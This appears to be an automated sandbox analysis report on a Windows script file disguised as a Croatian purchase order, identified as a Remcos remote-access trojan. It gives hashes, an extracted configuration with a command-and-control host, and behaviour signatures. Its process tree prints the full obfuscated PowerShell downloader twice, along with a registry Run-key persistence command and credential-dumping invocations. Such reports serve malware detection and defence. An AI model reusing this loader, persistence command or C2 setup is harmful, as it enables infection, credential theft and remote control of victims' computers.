Overview

overview

10

Static

static

1

narudžben...23.wsf

windows10-1703-x64

10

narudžben...23.wsf

windows7-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    14-10-2024 07:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    narudžbenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf

  • Size

    14KB

  • MD5

    00ac87a7b7f4c47f372f933a0591f5a0

  • SHA1

    7b598b1d68948d6a592d4bd28b7c8b1797705554

  • SHA256

    42459d2d84eff34c05f1dd8bdccd7c968606eefd5773bd8fa442cb2a053b3fa0

  • SHA512

    e2df538514eb5f1c76ad018ccc13a37f08667c337d2eed22669d11bdf8c83e75f72eb9f477e4264208606d65d2dd36f658f5982dd7d5f29c9c08232d207a125b

  • SSDEEP

    384:ULqtQwkekctuEedeD42r2TT8FVB+4CpGH:UqtQI2j8G8F33Cpw

Score
10/10
remcosremotehostcollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

dumboi.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-8AXK3L

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 7 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\narudžbenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1436
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:5032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Kontointerval Strubehovederne Retromingently Celebreringen #>;$Udtrkning='Uforglemmeliges';<#Dispachrers Straffesagernes Genvlgende Mna caulescent #>;$Ofrings=$skvalderens+$host.UI;If ($Ofrings) {$Relernes214nterval++;}function ridsenaalens($Ootocous){$Flyverens=$Respue+$Ootocous.'Length'-$Relernes214nterval; for( $Relernes214=7;$Relernes214 -lt $Flyverens;$Relernes214+=8){$Lepidosauria='Fribytter';$Paavirkendes+=$Ootocous[$Relernes214];$Thighs='strklrredernes';}$Paavirkendes;}function Singlescullerne($Bortfaldendes){ & ($Sixtieths105) ($Bortfaldendes);}$Chrysis=ridsenaalens 'OvergraMBryggedoFeatherzStjerneiDahome ldeputerlalfade,aTaarnug/Carth g5 Fatti..slvfade0 ilbage Indsprj(DisilluW TrochoiKys.strn Poro,idAdelphiofroisesw Impo tsB oting TalismaNSparkisTMis.abl Ma mho1Uter ab0Tal.str.Paynimf0Viviend; yppig rendezWUnmortgi Pozet nk nsule6Unconsc4Rh,pidi;Verti i Kanon nxAnstalt6Etageva4Meta tr; Hov dk Paral,ir BibliovQuindec: Ko sen1R.allns2Lactuc.1Tilbage.Nas.for0Aftjent)B.ndsaa Hderli.GLigblegeLnserprc ntaink Skrabeo,orsaml/Catenul2Pligtfo0Eskapis1Konturl0Straffe0 Thorac1Eugen,l0magistr1Kastesm ExecutiFCarboniiSchchtsr .ankefeKame erf RestoroFuldti xA,toopr/Pteropo1 rgent2Bouetbu1 Katte,.Forttte0Hakealb ';$Diderichs=ridsenaalens 'LipaemiUDipleu.SDodecylEJackbirr zanjon-AxminstA Dort.eGRiddersEKonkursNSyvsovetDraught ';$Vgavisernes=ridsenaalens 'KamaruphF,lketlt L angttPolymelp Beefeds Entitl:Latentl/F.rmant/ hermangKrukk roPotpourvMuggin aProcrealBundlaglOveranxcAppling.G,andamofilmeb rKvinderg Vedhft/ uskadMAnve dea Forbr.nCauteryd Film,ta LoquacnSnd gent kovfyeClef.udrSt vninnSwathineLuminops Drikke1Sicilia7Dumpeka1Driftsp. enaissaEksplosc Dunbirapi.neer ';$Deactivating=ridsenaalens 'Uriskin>Kondita ';$Sixtieths105=ridsenaalens ' C,bsbiI BetonbeKvutzaiXTagvrke ';$Seleucidic='Platopic';$Bearbejdningerne214='\Delicat.Enk';Singlescullerne (ridsenaalens 'Dgenigt$EjendomGO teretLVin nerOTeeto ub LsehasASla terl Stockb:SpeedinNSelvantYIndologMEngraf,PGradelyhJujuistOPrse foLB.varysegru,pemPA tomektPre ent=Toffsas$InddkkeEArabizenFornuftVSymboli:Domini A ScholapBowdlerpOr.hoscdBelrtskAKadmiumT BankbeaShaslik+Veteran$O startbStofmise,ulfuriAThora,ir NumerabMakutase Ouch dJ TendendFrimndsnimpendei SprangNUlt,astGSving sEProgramrUnequalni ndehaeRecrush2Tessara1 ,rsteg4 Leksik ');Singlescullerne (ridsenaalens 'Larmen.$Lift pagKrysantlAldermeoClar.nib Ma hicAPrefad LUdtvre.:Dadais,QSealyh.U Akva.iAUnig,niVHeterogEIndkomsrQu ckeniMowlandn ,mittegMorrosbl TonersY Acidos= .smosi$inceptivSkylning KontraaBaandstV BusaosI OtherwSUnattenEUnscantRBriket.nParlayiE uldsmsAfnazif.NattierS .estigp ilbagLFilmcenIUndert.THavrnen(M.lbrou$CosheriD SinoloeSkgla eABrudde CSombrertHoneysui BidflaVS ortrjA entraltEuripusiHeid erN FrightgPresymp) Bignon ');Singlescullerne (ridsenaalens 'Protog [ SkrmbiN DepraveT rascaTAnsgnin. MarginS S arereInducerrPlades VMurvaloiDiskettC Afly eELoyalespHjulpisOIcebergITropicaNWindel.tResuit,MTinder AHe melinMiddle aTorsdaggImedenseBremsesrDevalue]Byzoner:Ationer:PepinosSUpraiseeProtanoCAgentryUGrundforCatvvidi Drikk,tFotomonyHyperboP Classrr Oversio LigninTgyro agoArtist c UlyksaOForstaalStorher Novosd=Todages strmn n[S angemnSt rbarE edisniTParapod.Sporidis ,adiole skraldcunveilpuInannasREa thfaIKroketktE sterryUtahl,kPInt mperUn,erbeoAndrhacTKontoplOMuricoiCvarmeleoUncultulNoncirctLipidshy G.ldstpportrspeUngiven]Veksles:Dyingep:Tres,alTMu.ikalLTulipflS Overga1Densito2Eksempe ');$Vgavisernes=$Quaveringly[0];$kardanernes=(ridsenaalens 'Infanti$Quini lg TarryilRivetheOSundhedBJap axiaTidsbesLTagvrke:Puruloir BananseAnfoerePPaateg OPhycoxaUSkrmfelsUnderl.s PoisonEDeposit=eu omannreobjeceSbeurteWphaneri-plantenoNonpariBPara ynJVveriere DunenecSurrountLoftsru U lsninsPresseeYLgnedetSCoharmotFrijordEOv.rmtnmArneste.BelnninN ,dredteLaminerTSk,lsaa.Man ikiWPredi.eE AffaldbKonf.recSoc oceLpodsoldIWhat itEDiapasoNCementetNephros ');Singlescullerne ($kardanernes);Singlescullerne (ridsenaalens 'Opr kla$AndreasRWoolmene intergpBriterto Li.cheuSup.rimsReverins SannyaeBol erv.KostaldHNautilieSlyn,boa DiametdVarelageSlubbetrTil.taas diplo [Woollyo$ScaffjuDTir dagi FiletkdRaskesae JumpsurRot lski MutesacSilkesohFrottehsSlidser]Unme iu=skandal$ScotchiCHelmetphDial.ktrAbonninyObject sFebreoviStberansVerdens ');$Overdoctrinize=ridsenaalens ' Lillib$Reco taRPu.porteHjerterpPebbl do,ueridauDeeskalsVenstresJusticee Paasky.AasenswD BiograoBykongewHmm desnDa.natol StetosoHumanisa ConcildFlngessF DyreveiDdskn elHarborseVogtesg(Takkefe$ Loos rVSe.gebogCarbolfaQuarrelvYawnproi,krubnis Paamone PokomorEquivalnUncontre Underss Stvlet,Att ibu$FrancisM ordbunabesvimebAndespii PreboinDyrebaroSjuskedgU,bombni Bureauo Immig,nUdetill) ragtgo ';$Mabinogion=$Nympholept;Singlescullerne (ridsenaalens 'Pepperi$Oo thalGpalmehal TreholO Immo ibfje,debA harrumLMellemb: ObservMOrdg deE reinksTMulcibehCentra E Udbrn.nKvanti y RamtesLAtomsto=Enddama(Smleriet Mid.aseGossipms akkekaT Dev ra-NonmusipInspecta A,lutiTSkrfninHi onisk Unfatte$MorphogmSidestiAMaskinhB ManostIOut tudnKontrolOFrprisugAagerubI StandaoHvssed nSaraban)Steri r ');while (!$Methenyl) {Singlescullerne (ridsenaalens ' Skolek$H lvvaagTrfriwil GithssoKonsignbEtpartiaKroni,rlDealate:ArchpilN ConcedoLagerinrDefossit Mar arhEfterslwMot vosa BegribrVrneplidHeder,e1ou weav8Ldervin=Korn li$ ReastytaplanobrSommervu Mouse,eGastroe ') ;Singlescullerne $Overdoctrinize;Singlescullerne (ridsenaalens 'scramassBosslettSuppeviAArthrotrTraktertBonanza- AfspalsMyotherlekserceEAr oretEGangb.ePDekantg Slavel 4Sr.tter ');Singlescullerne (ridsenaalens 'Statuar$OceanoggUndergrL RealkaO .iraarBWalleyeADextrall ntepo: Ursagemharts.oeBogui.gTBeklagehGangt nePlejlf NZaremasyKata ulLAugm,nt=Clavilu(Amuguist oxcomieDatabraS EkspretHa enpa-skr aplPTil odeAFastelatPlebeiaH.ostret Sabe.l$ ReluctmMaeandeaMde ligB TeleskiAssagainViciousoRuslandgVinyl oiLockat o extromNChemist)Krigser ') ;Singlescullerne (ridsenaalens 'S.aadel$TuneserG TabtasL G ringoN ragheB Expo.taYardinglNonproj:TritelytK iminorEneulykASlvtjssi As,ignNTrans,oa OlivingUnseemieP,renti=Sunroom$CrepitoG PilotpLBurun.iomuc indb D monsATestprolMishand:LuftfarDLgensstaCuriacutSav rleaHandelsBCzechsoaBlo.besSskrmtvieg dkendAOrrisrodWastepaMRhizoceiOr ngutnNiacin,iP,roracS mericaTOmgaaelrAmraintA RidicutPlastreIInto.erOSubtot NamourouEPraelecrUrostif+Ru elen+Nitride%thrilla$,onvisuqOprejstu Vario.a PursuiVTet atoEBlinde,rOpalesciEigenstN AikenrgTiresfrLLeucomaYS,desyn.Stvningc DrageloHidsighUgrandneN AchaetTOrthot ') ;$Vgavisernes=$Quaveringly[$trainage];}$Ankomsttiden=321370;$Nightlike=33753;Singlescullerne (ridsenaalens 'D.vital$SkiftepGOverneulPont.sgoCaricesbSpejlinAR adgivlDrikkeh: S mmenP Telefor,atewarCAfsondrIUl.ramasMysteriiTilfldio Ubrd.lnSisterhsOmsor sASteatosrPseud pBOpkrvniE VandgaJTob,ggaDparen eeCumulocTViljelsshanknsv Stttefo=Backhau Un ansg avaersETalkolotNccskad-NonreclClin efoOLac.estN Jelonat RenummERetr evnInt rnuTChristi Takkel.$ SybariMCan likA SemafobBloodi,iSilverbN SilkesoForbehoGIde litIbaviaanO UbetvinCasefie ');Singlescullerne (ridsenaalens 'Tupi,ak$Foregivg.orstaalLight.ro G,iastb Eyebeaaspaget l Bernh :TriariaA Peris lPissoi aspej.blr Aar,skmAnpartsePunkiesrOpdr.gee Co dovdMouseioeEc,rtessColvern Granula=Overd,b Monop.[TvrendeSUncakrnyOmma easGabmarmtEyecupseSkbne,lmMackle,.FilibusCVaporetoScrawninClangerv MembraemicrojurStatsratConscri] Modefo: Kamply:cele reFP,thonorbarnevro Ex,atrmTanniesBKopulakaDrailinsNayapreeGgennet6Dybblsb4Boatlo S yntetit RrsangrSocialmi Svi dsnPo.tgang Tilsky( Coal a$NaturfaPScowm nrArbejdecT lhylniKevinsdsprologui SleskloEksportnscrupulsha.tensacatso,srForsirib ulliloeRak,tisjPlenarmdSagittieDisubsttStriktus almin) gl,nsb ');Singlescullerne (ridsenaalens ' omri g$Ud algeGTur idilFluteneo nugglBD.ggeriaStegninL orgmu:HavmiljCNo.demoRGeneraleGlo aliaHo perdtByraa siBe lestnTangforUSlvlamerAlvildei HulemaASurde t Oligoch=Puccoon Do belt[ VariabSB ckwinY utstans lind.rtGeo etrE oldwatmGowpina.Di bolotUdd taseFreudiaXTjre elTBindest.Baryt,fEZeol ttnBal neycNo itseoWoodcocdDaarpoliFlng.rnn TheoloGPassuss]Craftsm:Coun er:Unsa itAR kindlsWinebibc.oolskiiDraphavi Halter.HeelpriGVestmagEEnum raT FllesssT lstaatB.flittrForetagIYokewoonEksaminG Trykfa(Sultest$DaakalvaMon,rchL Pr nelAEntabler Blo,erm ForestELi iestRFor udsEAnlgsfodTrissebeRi.gforsIdmtesk) mekani ');Singlescullerne (ridsenaalens 'C lesin$ AphicigTerebraLFrsteplOLabbenlbDamphamaLrermdel,aveeje:SkoggerfFertiliuAncylosNAkupunkKProjicitGrundbyIGro elioLacerabnDestru E k anisLSvangreT Spanis=Snozzle$Mudd.olcKatrynsr LandbrEFinnsmaatru ntnT averei ThanatnConimenUBundfloRObsknitiCriddleaMorfade.PartnersImpertiUWhinni BUn,karlSMornen.tAnarchaR VaporiiPerigasn Demok.GTr punk(Quethef$GalleriAMestresN De raukSys emfoSynkronm asqueS Retteath terocT Reol,wi painfudgr fikreAvancerNBetisut,Aktivis$ NonexcN NonsaliPolychrGblyantsHFrictioT hyenifL Li hodiMajorerKHypernaE ydafri)a tenik ');Singlescullerne $Funktionelt;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Kontointerval Strubehovederne Retromingently Celebreringen #>;$Udtrkning='Uforglemmeliges';<#Dispachrers Straffesagernes Genvlgende Mna caulescent #>;$Ofrings=$skvalderens+$host.UI;If ($Ofrings) {$Relernes214nterval++;}function ridsenaalens($Ootocous){$Flyverens=$Respue+$Ootocous.'Length'-$Relernes214nterval; for( $Relernes214=7;$Relernes214 -lt $Flyverens;$Relernes214+=8){$Lepidosauria='Fribytter';$Paavirkendes+=$Ootocous[$Relernes214];$Thighs='strklrredernes';}$Paavirkendes;}function Singlescullerne($Bortfaldendes){ & ($Sixtieths105) ($Bortfaldendes);}$Chrysis=ridsenaalens 'OvergraMBryggedoFeatherzStjerneiDahome ldeputerlalfade,aTaarnug/Carth g5 Fatti..slvfade0 ilbage Indsprj(DisilluW TrochoiKys.strn Poro,idAdelphiofroisesw Impo tsB oting TalismaNSparkisTMis.abl Ma mho1Uter ab0Tal.str.Paynimf0Viviend; yppig rendezWUnmortgi Pozet nk nsule6Unconsc4Rh,pidi;Verti i Kanon nxAnstalt6Etageva4Meta tr; Hov dk Paral,ir BibliovQuindec: Ko sen1R.allns2Lactuc.1Tilbage.Nas.for0Aftjent)B.ndsaa Hderli.GLigblegeLnserprc ntaink Skrabeo,orsaml/Catenul2Pligtfo0Eskapis1Konturl0Straffe0 Thorac1Eugen,l0magistr1Kastesm ExecutiFCarboniiSchchtsr .ankefeKame erf RestoroFuldti xA,toopr/Pteropo1 rgent2Bouetbu1 Katte,.Forttte0Hakealb ';$Diderichs=ridsenaalens 'LipaemiUDipleu.SDodecylEJackbirr zanjon-AxminstA Dort.eGRiddersEKonkursNSyvsovetDraught ';$Vgavisernes=ridsenaalens 'KamaruphF,lketlt L angttPolymelp Beefeds Entitl:Latentl/F.rmant/ hermangKrukk roPotpourvMuggin aProcrealBundlaglOveranxcAppling.G,andamofilmeb rKvinderg Vedhft/ uskadMAnve dea Forbr.nCauteryd Film,ta LoquacnSnd gent kovfyeClef.udrSt vninnSwathineLuminops Drikke1Sicilia7Dumpeka1Driftsp. enaissaEksplosc Dunbirapi.neer ';$Deactivating=ridsenaalens 'Uriskin>Kondita ';$Sixtieths105=ridsenaalens ' C,bsbiI BetonbeKvutzaiXTagvrke ';$Seleucidic='Platopic';$Bearbejdningerne214='\Delicat.Enk';Singlescullerne (ridsenaalens 'Dgenigt$EjendomGO teretLVin nerOTeeto ub LsehasASla terl Stockb:SpeedinNSelvantYIndologMEngraf,PGradelyhJujuistOPrse foLB.varysegru,pemPA tomektPre ent=Toffsas$InddkkeEArabizenFornuftVSymboli:Domini A ScholapBowdlerpOr.hoscdBelrtskAKadmiumT BankbeaShaslik+Veteran$O startbStofmise,ulfuriAThora,ir NumerabMakutase Ouch dJ TendendFrimndsnimpendei SprangNUlt,astGSving sEProgramrUnequalni ndehaeRecrush2Tessara1 ,rsteg4 Leksik ');Singlescullerne (ridsenaalens 'Larmen.$Lift pagKrysantlAldermeoClar.nib Ma hicAPrefad LUdtvre.:Dadais,QSealyh.U Akva.iAUnig,niVHeterogEIndkomsrQu ckeniMowlandn ,mittegMorrosbl TonersY Acidos= .smosi$inceptivSkylning KontraaBaandstV BusaosI OtherwSUnattenEUnscantRBriket.nParlayiE uldsmsAfnazif.NattierS .estigp ilbagLFilmcenIUndert.THavrnen(M.lbrou$CosheriD SinoloeSkgla eABrudde CSombrertHoneysui BidflaVS ortrjA entraltEuripusiHeid erN FrightgPresymp) Bignon ');Singlescullerne (ridsenaalens 'Protog [ SkrmbiN DepraveT rascaTAnsgnin. MarginS S arereInducerrPlades VMurvaloiDiskettC Afly eELoyalespHjulpisOIcebergITropicaNWindel.tResuit,MTinder AHe melinMiddle aTorsdaggImedenseBremsesrDevalue]Byzoner:Ationer:PepinosSUpraiseeProtanoCAgentryUGrundforCatvvidi Drikk,tFotomonyHyperboP Classrr Oversio LigninTgyro agoArtist c UlyksaOForstaalStorher Novosd=Todages strmn n[S angemnSt rbarE edisniTParapod.Sporidis ,adiole skraldcunveilpuInannasREa thfaIKroketktE sterryUtahl,kPInt mperUn,erbeoAndrhacTKontoplOMuricoiCvarmeleoUncultulNoncirctLipidshy G.ldstpportrspeUngiven]Veksles:Dyingep:Tres,alTMu.ikalLTulipflS Overga1Densito2Eksempe ');$Vgavisernes=$Quaveringly[0];$kardanernes=(ridsenaalens 'Infanti$Quini lg TarryilRivetheOSundhedBJap axiaTidsbesLTagvrke:Puruloir BananseAnfoerePPaateg OPhycoxaUSkrmfelsUnderl.s PoisonEDeposit=eu omannreobjeceSbeurteWphaneri-plantenoNonpariBPara ynJVveriere DunenecSurrountLoftsru U lsninsPresseeYLgnedetSCoharmotFrijordEOv.rmtnmArneste.BelnninN ,dredteLaminerTSk,lsaa.Man ikiWPredi.eE AffaldbKonf.recSoc oceLpodsoldIWhat itEDiapasoNCementetNephros ');Singlescullerne ($kardanernes);Singlescullerne (ridsenaalens 'Opr kla$AndreasRWoolmene intergpBriterto Li.cheuSup.rimsReverins SannyaeBol erv.KostaldHNautilieSlyn,boa DiametdVarelageSlubbetrTil.taas diplo [Woollyo$ScaffjuDTir dagi FiletkdRaskesae JumpsurRot lski MutesacSilkesohFrottehsSlidser]Unme iu=skandal$ScotchiCHelmetphDial.ktrAbonninyObject sFebreoviStberansVerdens ');$Overdoctrinize=ridsenaalens ' Lillib$Reco taRPu.porteHjerterpPebbl do,ueridauDeeskalsVenstresJusticee Paasky.AasenswD BiograoBykongewHmm desnDa.natol StetosoHumanisa ConcildFlngessF DyreveiDdskn elHarborseVogtesg(Takkefe$ Loos rVSe.gebogCarbolfaQuarrelvYawnproi,krubnis Paamone PokomorEquivalnUncontre Underss Stvlet,Att ibu$FrancisM ordbunabesvimebAndespii PreboinDyrebaroSjuskedgU,bombni Bureauo Immig,nUdetill) ragtgo ';$Mabinogion=$Nympholept;Singlescullerne (ridsenaalens 'Pepperi$Oo thalGpalmehal TreholO Immo ibfje,debA harrumLMellemb: ObservMOrdg deE reinksTMulcibehCentra E Udbrn.nKvanti y RamtesLAtomsto=Enddama(Smleriet Mid.aseGossipms akkekaT Dev ra-NonmusipInspecta A,lutiTSkrfninHi onisk Unfatte$MorphogmSidestiAMaskinhB ManostIOut tudnKontrolOFrprisugAagerubI StandaoHvssed nSaraban)Steri r ');while (!$Methenyl) {Singlescullerne (ridsenaalens ' Skolek$H lvvaagTrfriwil GithssoKonsignbEtpartiaKroni,rlDealate:ArchpilN ConcedoLagerinrDefossit Mar arhEfterslwMot vosa BegribrVrneplidHeder,e1ou weav8Ldervin=Korn li$ ReastytaplanobrSommervu Mouse,eGastroe ') ;Singlescullerne $Overdoctrinize;Singlescullerne (ridsenaalens 'scramassBosslettSuppeviAArthrotrTraktertBonanza- AfspalsMyotherlekserceEAr oretEGangb.ePDekantg Slavel 4Sr.tter ');Singlescullerne (ridsenaalens 'Statuar$OceanoggUndergrL RealkaO .iraarBWalleyeADextrall ntepo: Ursagemharts.oeBogui.gTBeklagehGangt nePlejlf NZaremasyKata ulLAugm,nt=Clavilu(Amuguist oxcomieDatabraS EkspretHa enpa-skr aplPTil odeAFastelatPlebeiaH.ostret Sabe.l$ ReluctmMaeandeaMde ligB TeleskiAssagainViciousoRuslandgVinyl oiLockat o extromNChemist)Krigser ') ;Singlescullerne (ridsenaalens 'S.aadel$TuneserG TabtasL G ringoN ragheB Expo.taYardinglNonproj:TritelytK iminorEneulykASlvtjssi As,ignNTrans,oa OlivingUnseemieP,renti=Sunroom$CrepitoG PilotpLBurun.iomuc indb D monsATestprolMishand:LuftfarDLgensstaCuriacutSav rleaHandelsBCzechsoaBlo.besSskrmtvieg dkendAOrrisrodWastepaMRhizoceiOr ngutnNiacin,iP,roracS mericaTOmgaaelrAmraintA RidicutPlastreIInto.erOSubtot NamourouEPraelecrUrostif+Ru elen+Nitride%thrilla$,onvisuqOprejstu Vario.a PursuiVTet atoEBlinde,rOpalesciEigenstN AikenrgTiresfrLLeucomaYS,desyn.Stvningc DrageloHidsighUgrandneN AchaetTOrthot ') ;$Vgavisernes=$Quaveringly[$trainage];}$Ankomsttiden=321370;$Nightlike=33753;Singlescullerne (ridsenaalens 'D.vital$SkiftepGOverneulPont.sgoCaricesbSpejlinAR adgivlDrikkeh: S mmenP Telefor,atewarCAfsondrIUl.ramasMysteriiTilfldio Ubrd.lnSisterhsOmsor sASteatosrPseud pBOpkrvniE VandgaJTob,ggaDparen eeCumulocTViljelsshanknsv Stttefo=Backhau Un ansg avaersETalkolotNccskad-NonreclClin efoOLac.estN Jelonat RenummERetr evnInt rnuTChristi Takkel.$ SybariMCan likA SemafobBloodi,iSilverbN SilkesoForbehoGIde litIbaviaanO UbetvinCasefie ');Singlescullerne (ridsenaalens 'Tupi,ak$Foregivg.orstaalLight.ro G,iastb Eyebeaaspaget l Bernh :TriariaA Peris lPissoi aspej.blr Aar,skmAnpartsePunkiesrOpdr.gee Co dovdMouseioeEc,rtessColvern Granula=Overd,b Monop.[TvrendeSUncakrnyOmma easGabmarmtEyecupseSkbne,lmMackle,.FilibusCVaporetoScrawninClangerv MembraemicrojurStatsratConscri] Modefo: Kamply:cele reFP,thonorbarnevro Ex,atrmTanniesBKopulakaDrailinsNayapreeGgennet6Dybblsb4Boatlo S yntetit RrsangrSocialmi Svi dsnPo.tgang Tilsky( Coal a$NaturfaPScowm nrArbejdecT lhylniKevinsdsprologui SleskloEksportnscrupulsha.tensacatso,srForsirib ulliloeRak,tisjPlenarmdSagittieDisubsttStriktus almin) gl,nsb ');Singlescullerne (ridsenaalens ' omri g$Ud algeGTur idilFluteneo nugglBD.ggeriaStegninL orgmu:HavmiljCNo.demoRGeneraleGlo aliaHo perdtByraa siBe lestnTangforUSlvlamerAlvildei HulemaASurde t Oligoch=Puccoon Do belt[ VariabSB ckwinY utstans lind.rtGeo etrE oldwatmGowpina.Di bolotUdd taseFreudiaXTjre elTBindest.Baryt,fEZeol ttnBal neycNo itseoWoodcocdDaarpoliFlng.rnn TheoloGPassuss]Craftsm:Coun er:Unsa itAR kindlsWinebibc.oolskiiDraphavi Halter.HeelpriGVestmagEEnum raT FllesssT lstaatB.flittrForetagIYokewoonEksaminG Trykfa(Sultest$DaakalvaMon,rchL Pr nelAEntabler Blo,erm ForestELi iestRFor udsEAnlgsfodTrissebeRi.gforsIdmtesk) mekani ');Singlescullerne (ridsenaalens 'C lesin$ AphicigTerebraLFrsteplOLabbenlbDamphamaLrermdel,aveeje:SkoggerfFertiliuAncylosNAkupunkKProjicitGrundbyIGro elioLacerabnDestru E k anisLSvangreT Spanis=Snozzle$Mudd.olcKatrynsr LandbrEFinnsmaatru ntnT averei ThanatnConimenUBundfloRObsknitiCriddleaMorfade.PartnersImpertiUWhinni BUn,karlSMornen.tAnarchaR VaporiiPerigasn Demok.GTr punk(Quethef$GalleriAMestresN De raukSys emfoSynkronm asqueS Retteath terocT Reol,wi painfudgr fikreAvancerNBetisut,Aktivis$ NonexcN NonsaliPolychrGblyantsHFrictioT hyenifL Li hodiMajorerKHypernaE ydafri)a tenik ');Singlescullerne $Funktionelt;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:528
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:36100
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udredende" /t REG_EXPAND_SZ /d "%Lossless% -windowstyle 1 $Sourish=(gp -Path 'HKCU:\Software\Trains40\').Chromoplast167;%Lossless% ($Sourish)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:68888
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udredende" /t REG_EXPAND_SZ /d "%Lossless% -windowstyle 1 $Sourish=(gp -Path 'HKCU:\Software\Trains40\').Chromoplast167;%Lossless% ($Sourish)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:44472
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pkxcufqpjnpeqmpmdyohty"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:94776
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\aecvnybjfvhrbslqmjbjelspml"
        3⤵
          PID:98472
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\aecvnybjfvhrbslqmjbjelspml"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:98464
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\khhnoqmltdzwdgauduokhqnyvsfnl"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:7592

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      474d631e3a03b3ebca15c67e35d4e1ad

      SHA1

      e9e613bf99753ba44bce3ed21d38b48e674263e7

